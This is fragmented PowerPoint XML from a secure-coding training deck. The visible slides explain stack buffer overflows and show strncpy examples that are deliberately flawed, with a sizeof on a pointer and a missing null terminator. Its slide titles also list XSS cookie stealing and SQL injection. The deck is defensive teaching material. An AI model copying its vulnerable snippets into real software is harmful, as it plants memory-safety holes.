            <a:ext cx="1730375" cy="1265237"/>
            <a:chOff x="3491" y="1872"/>
            <a:chExt cx="1090" cy="797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491" y="2316"/>
              <a:ext cx="676" cy="353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9261" name="Picture 38" descr="Funny Guy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05" y="1872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2468563" y="1208088"/>
            <a:ext cx="4694237" cy="1154112"/>
            <a:chOff x="1509" y="596"/>
            <a:chExt cx="2957" cy="727"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9250" name="Rectangle 39"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2683" y="857"/>
              <a:ext cx="967" cy="46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Function </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>return </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>address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1509" y="841"/>
              <a:ext cx="989" cy="482"/>
              <a:chOff x="1238" y="819"/>
              <a:chExt cx="989" cy="482"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9257" name="Text Box 45"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1238" y="819"/>
                <a:ext cx="98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Exception handlers</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9258" name="Text Box 46"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1243" y="964"/>
                <a:ext cx="92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Function pointers</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9259" name="Text Box 47"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1240" y="1109"/>
                <a:ext cx="8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Virtual methods</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp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1913" y="596"/>
              <a:ext cx="2553" cy="378"/>
              <a:chOff x="1913" y="596"/>
              <a:chExt cx="2553" cy="378"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9253" name="Text Box 50"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3202" y="596"/>
                <a:ext cx="1264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000">
                    <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>All determine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>
                    <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>execution flow</a:t>
                </a:r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 flipH="1">
                <a:off x="1922" y="744"/>
                <a:ext cx="1163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43" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1913" y="744"/>
                <a:ext cx="0" cy="10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44" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2748" y="742"/>
                <a:ext cx="0" cy="10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739775" y="2352675"/>
            <a:ext cx="4241800" cy="693738"/>
            <a:chOff x="347" y="3767"/>
            <a:chExt cx="2672" cy="437"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle 69"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="347" y="3909"/>
              <a:ext cx="2672" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="hlink">
                <a:alpha val="4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  <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9244" name="Picture 70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65" y="3814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5" name="Picture 71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14" y="3891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6" name="Picture 72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96" y="3802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7" name="Picture 73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7" y="3920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8" name="Picture 74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0" y="3848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9" name="Picture 75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34" y="3767"/>
              <a:ext cx="47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715963" y="2352675"/>
            <a:ext cx="1582737" cy="665163"/>
            <a:chOff x="437" y="1296"/>
            <a:chExt cx="997" cy="419"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9239" name="Picture 77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7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0" name="Picture 78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0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1" name="Picture 79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02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2" name="Picture 80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34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4" name="AutoShape 81"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2100262" y="1739901"/>
            <a:ext cx="131763" cy="2424112"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 27228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5" name="AutoShape 82"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000" flipH="1" flipV="1">
            <a:off x="2406650" y="661988"/>
            <a:ext cx="333375" cy="3714750"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68569"/>
              <a:gd name="adj2" fmla="val 10615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72238" y="3065463"/>
            <a:ext cx="184150" cy="36988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rot="5400000">
            <a:off x="5373687" y="3624263"/>
            <a:ext cx="1014413" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cap="flat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343400" y="6019800"/>
            <a:ext cx="3962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Bad things happen if * p points to data larger than buffer b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7291-4719-41F9-BB9F-6FDEF11A9FA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8" name="Picture 58" descr="C:\Documents and Settings\EclipSec Kevin Lam\Local Settings\Temporary Internet Files\Content.IE5\SDEXITI7\MCj0431521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419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5629275" y="5257800"/>
            <a:ext cx="2905125" cy="990600"/>
            <a:chOff x="5629275" y="5257800"/>
            <a:chExt cx="2905125" cy="990457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 flipV="1">
              <a:off x="5629275" y="5576842"/>
              <a:ext cx="2108200" cy="253963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9238" name="Picture 63" descr="C:\Documents and Settings\EclipSec Kevin Lam\Local Settings\Temporary Internet Files\Content.IE5\OVSPOLA5\MCj04347500000[1]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43943" y="5257800"/>
              <a:ext cx="990457" cy="990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The C/C++ n-Functions </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Are Safe Right?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8657" y="3633716"/>
            <a:ext cx="82296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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Example #2: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</a:rPr>
              <a:t>#define MAX (50)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szDest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[MAX];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ourier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strncpy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szDest,pszSrc,MAX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5952" y="1603612"/>
            <a:ext cx="82296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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Example #1: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</a:rPr>
              <a:t>// Code verifies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pszSrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is &lt;= 50 chars)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</a:rPr>
              <a:t>pszSrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is a char 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</a:rPr>
              <a:t>#define MAX (50)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pszDest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pszSrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strncpy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pszDest,pszSrc,MAX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74321-DBB7-420F-9A3E-F56B7FCF615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5257800"/>
            <a:ext cx="5562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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extra care to prevent buffer overflows is still required when using n-functions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1752600"/>
            <a:ext cx="2743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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof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pszSrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) is 4 bytes, not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3886200"/>
            <a:ext cx="2743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</a:rPr>
              <a:t>String is not null-terminated if length of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pszSrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;=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1284</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>285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Secure Implementation Overview</vt:lpstr>
      <vt:lpstr>Input Validation Tips</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>Stack Overflows at Work</vt:lpstr>
      <vt:lpstr>The C/C++ n-Functions  Are Safe Right?</vt:lpstr>
      <vt:lpstr>Buffer Overflow Remedies</vt:lpstr>
      <vt:lpstr>Integer Arithmetic Errors</vt:lpstr>
      <vt:lpstr>Integer Arithmetic Error Example</vt:lpstr>
      <vt:lpstr>Integer Arithmetic Error Remedies</vt:lpstr>
      <vt:lpstr>Canonicalization Issues</vt:lpstr>
      <vt:lpstr>Canonicalization Example</vt:lpstr>
      <vt:lpstr>Canonicalization Issue Remedies</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS) Issues</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Example:  Cookie Stealing</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Remedies</vt:lpstr>
      <vt:lpstr>SQL Injection Issues</vt:lpstr>
      <vt:lpstr>SQL Injection Example</vt:lpstr>
      <vt:lpstr>SQL Injection Example</vt:lpstr>
      <vt:lpstr>SQL Injection Remedies</vt:lpstr>
      <vt:lpstr>Cryptographic Weaknesses</vt:lpstr>
      <vt:lpstr>Top Common  Cryptographic Mistakes</vt:lpstr>
      <vt:lpstr>Remedies for Top Common Cryptographic Weaknesses</vt:lpstr>
      <vt:lpstr>Beware, Not All Cryptographic  Standards Are Safe!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